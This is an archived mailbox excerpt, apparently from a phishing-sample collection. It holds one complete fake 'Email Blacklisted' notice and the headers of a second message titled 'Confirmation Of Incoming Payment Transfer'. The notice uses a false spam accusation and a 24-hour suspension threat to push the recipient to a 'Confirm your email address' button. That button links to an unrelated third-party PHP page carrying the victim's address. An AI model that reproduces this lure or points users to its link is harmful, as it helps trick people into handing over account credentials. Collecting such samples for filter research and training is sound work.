From: "Mail Service" <server@message.com>
Date: Mon, 12 Dec 2016 15:49:17 -0500
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 460

You will not see this in a MIME-aware mail reader.
--===============0133778141==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


    =

   =


	  =

   =


 =

   Email Blacklisted

 =

   =


	  =

   =


 =

    =

   =


	  =

   =


 =

    Dear jose@monkey.org,
 Our record indicates that your account was detected of spam activities and=
 as a result has been blacklisted . Failure to confirm and update your acco=
unt within 24 hours will lead to it being  suspended permanently.


 Confirm your account below.

   =

   =


 =

    =

    =

   =


	 Confirm your email address	  =

   =


	  =

   =


  =

   =


   Best Regards =

Administrator. =

=A92016 Administrator. All Rights Reserved.

--===============0133778141==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><TABLE style=3D"WIDOWS: 2; TEXT-TRANSFORM: non=
e; FONT-STYLE: normal; TEXT-INDENT: 0px; LETTER-SPACING: normal; FONT-FAMIL=
Y: helvetica, arial, sans-serif; WHITE-SPACE: normal; ORPHANS: 2; COLOR: rg=
b(51,51,51); FONT-SIZE: 11px; FONT-WEIGHT: normal; WORD-SPACING: 0px; font-=
variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-w=
idth: 0px" border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" bgColo=
r=3D#333333>
<TBODY>
<TR>
<TD width=3D10>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD>
<TD width=3D"100%">
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-FAMILY: helvetica, arial, sans-serif" border=3D0 cellS=
pacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: helvetica, arial, sans-serif; COLOR: rgb(255,255,=
255); FONT-SIZE: 10pt" vAlign=3Dmiddle width=3D"100%" align=3Dleft><SPAN st=
yle=3D"FONT-FAMILY: helvetica, arial, sans-serif; COLOR: rgb(255,255,255); =
FONT-SIZE: 15pt">Email Blacklisted<BR></SPAN></TD></TR></TBODY></TABLE>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD>
<TD width=3D20>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D20>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<TABLE style=3D"WIDOWS: 2; TEXT-TRANSFORM: none; FONT-STYLE: normal; TEXT-I=
NDENT: 0px; LETTER-SPACING: normal; FONT-FAMILY: helvetica, arial, sans-ser=
if; WHITE-SPACE: normal; ORPHANS: 2; COLOR: rgb(51,51,51); FONT-SIZE: 11px;=
 FONT-WEIGHT: normal; WORD-SPACING: 0px; font-variant-ligatures: normal; fo=
nt-variant-caps: normal; -webkit-text-stroke-width: 0px" border=3D0 cellSpa=
cing=3D0 cellPadding=3D0 width=3D"100%" bgColor=3D#ffffff>
<TBODY>
<TR>
<TD width=3D20>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D20>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD>
<TD style=3D"LINE-HEIGHT: 18px; FONT-FAMILY: helvetica, arial, sans-serif; =
COLOR: rgb(51,51,51); FONT-SIZE: 15px" align=3Dleft>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE>
<TABLE style=3D"FONT-FAMILY: helvetica, arial, sans-serif; COLOR: rgb(51,51=
,51); FONT-SIZE: 16px" border=3D0 cellSpacing=3D0 cellPadding=3D0 width=3D"=
100%">
<TBODY>
<TR>
<TD>
<P>Dear jose@monkey.org,</P>
<P>Our record indicates that your account was detected of spam activities a=
nd as a result has been blacklisted . Failure to confirm and update your ac=
count within 24 hours will lead to it being&nbsp; suspended permanently.<BR=
><BR></P>
<P>Confirm your account below.</P></TD></TR>
<TR>
<TD>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D1>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D0 align=3Dleft>
<TBODY>
<TR>
<TD style=3D"BORDER-BOTTOM: rgb(232,180,99) 1px solid; BORDER-LEFT: rgb(232=
,180,99) 1px solid; BORDER-TOP: rgb(232,180,99) 1px solid; BORDER-RIGHT: rg=
b(232,180,99) 1px solid; border-radius: 3px" bgColor=3D#ffe86c height=3D30 =
vAlign=3Dmiddle align=3Dcenter>
<TABLE style=3D"FONT-FAMILY: helvetica, arial, sans-serif" border=3D0 cellS=
pacing=3D0 cellPadding=3D0 width=3D"100%" bgColor=3Dtransparent>
<TBODY>
<TR>
<TD width=3D13>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D13>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD>
<TD><A style=3D"DISPLAY: block; FONT-FAMILY: helvetica, arial, sans-serif; =
WHITE-SPACE: nowrap; COLOR: rgb(0,0,0); FONT-SIZE: 13px; FONT-WEIGHT: bold;=
 TEXT-DECORATION: none" href=3D"http://digitalvirgil.co.uk/pvs/1991/index.p=
hp?email=3Djose@monkey.org&amp;jose@monkey.org&amp;" rel=3Dnoreferrer targe=
t=3D_blank><SPAN style=3D"DISPLAY: block; FONT-FAMILY: helvetica, arial, sa=
ns-serif; WHITE-SPACE: nowrap; COLOR: rgb(0,0,0); FONT-SIZE: 13px; FONT-WEI=
GHT: bold">Con<SPAN style=3D"BACKGROUND-COLOR: rgb(255,255,255)"><SPAN></SP=
AN></SPAN>firm your email address</SPAN></A></TD>
<TD width=3D13>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D13>
<TBODY>
<TR>
<TD><SPAN style=3D"BACKGROUND-COLOR: rgb(0,0,255)"><SPAN></SPAN></SPAN><BR>=
</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TAB=
LE></TD></TR></TBODY></TABLE></TD>
<TD width=3D20>
<TABLE border=3D0 cellSpacing=3D0 cellPadding=3D1 width=3D20>
<TBODY>
<TR>
<TD><BR></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE><SPAN style=3D"=
WIDOWS: 2; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); FONT-S=
TYLE: normal; TEXT-INDENT: 0px; LETTER-SPACING: normal; DISPLAY: inline !im=
portant; FONT-FAMILY: 'Lucida Grande', Verdana, Arial, Helvetica, sans-seri=
f; WHITE-SPACE: normal; ORPHANS: 2; FLOAT: none; COLOR: rgb(51,51,51); FONT=
-SIZE: 11px; FONT-WEIGHT: normal; WORD-SPACING: 0px; font-variant-ligatures=
: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px">&nbsp;=
</SPAN> =

<TABLE style=3D"WIDOWS: 2; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,=
255,255); FONT-STYLE: normal; TEXT-INDENT: 0px; LETTER-SPACING: normal; FON=
T-FAMILY: 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; WHITE-SPA=
CE: normal; ORPHANS: 2; COLOR: rgb(51,51,51); FONT-SIZE: 11px; FONT-WEIGHT:=
 normal; WORD-SPACING: 0px; font-variant-ligatures: normal; font-variant-ca=
ps: normal; -webkit-text-stroke-width: 0px" border=3D0 cellSpacing=3D0 cell=
Padding=3D1 width=3D20>
<TBODY>
<TR>
<TD><SPAN style=3D"BACKGROUND-COLOR: rgb(0,0,255)"><SPAN></SPAN></SPAN><BR>=
</TD></TR></TBODY></TABLE>
<DIV style=3D"WIDOWS: 2; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,25=
5,255); FONT-STYLE: normal; TEXT-INDENT: 0px; LETTER-SPACING: normal; FONT-=
FAMILY: 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; WHITE-SPACE=
: normal; ORPHANS: 2; COLOR: rgb(51,51,51); FONT-SIZE: 13px; FONT-WEIGHT: n=
ormal; WORD-SPACING: 0px; font-variant-ligatures: normal; font-variant-caps=
: normal; -webkit-text-stroke-width: 0px">
<DIV style=3D"BORDER-TOP: 0px; PADDING-TOP: 0px">
<P>Best Regards<SPAN class=3DApple-converted-space>&nbsp;</SPAN><BR>Adminis=
trator.<SPAN class=3DApple-converted-space>&nbsp;</SPAN><BR><FONT color=3D#=
2e9afe size=3D2 face=3Darial>=A92016 Administrator. All Rights Reserved.</F=
ONT></P></DIV></DIV></BODY></HTML>
--===============0133778141==--

From jose@monkey.org Tue Dec 13 20:08:12 2016 +0000
Return-Path: safeguard@mailsender.com
Delivered-To: jose@monkey.org
X-FDA: 72287668824.11.wound59_64b8474011347
X-Spam-Summary: 75,0,0,91900f62b88ef268,d41d8cd98f00b204,safeguard@mailsender.com,:safeguard@mailsender.com,RULES_HIT:1:41:72:355:379:455:474:560:960:962:967:969:973:978:979:983:988:989:1189:1208:1221:1260:1263:1313:1314:1345:1381:1390:1394:1395:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1623:1685:1710:1712:1714:1730:1744:1776:1792:2194:2198:2199:2200:2525:2543:2568:2610:2635:2636:2682:2685:2693:2859:2890:2892:2894:2897:2915:2917:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3154:3350:3653:3770:3865:3867:3868:3870:3871:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4180:4250:4321:4383:5007:6096:6238:6261:6650:6674:6678:6687:6688:7266:7628:7809:8518:8599:8603:8957:8987:9025:9067:9149:9388:9411:9416:9908:10030:10049:10149:10216:10346:11256:11257:11657:11658:11914:12043:12050:12051:12438:12555:12561:12776:12986:13025:13110:13139:13374:13439:13868:14094:14096:14516:14687:21080:21326:21433:21450:
X-HE-Tag: wound59_64b8474011347
X-Filterd-Recvd-Size: 13460
Received: from smtp01.atlngahp.sys.nuvox.net (smtp01.atlngahp.sys.nuvox.net [70.43.63.18])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 13 Dec 2016 20:08:11 +0000 (UTC)
Received: from SouthlandHost.sedg.local (74.223.88.30.nw.nuvox.net [74.223.88.30])
	by smtp01.atlngahp.sys.nuvox.net (8.13.1/8.13.1) with ESMTP id uBDEfQTb005819;
	Tue, 13 Dec 2016 14:31:18 -0500
Message-Id: <201612131931.uBDEfQTb005819@smtp01.atlngahp.sys.nuvox.net>
Content-Type: multipart/alternative; boundary="===============1872691042=="
MIME-Version: 1.0
Subject: Confirmation Of Incoming Payment Transfer
To: Recipients <Safeguard@MailSender.com>
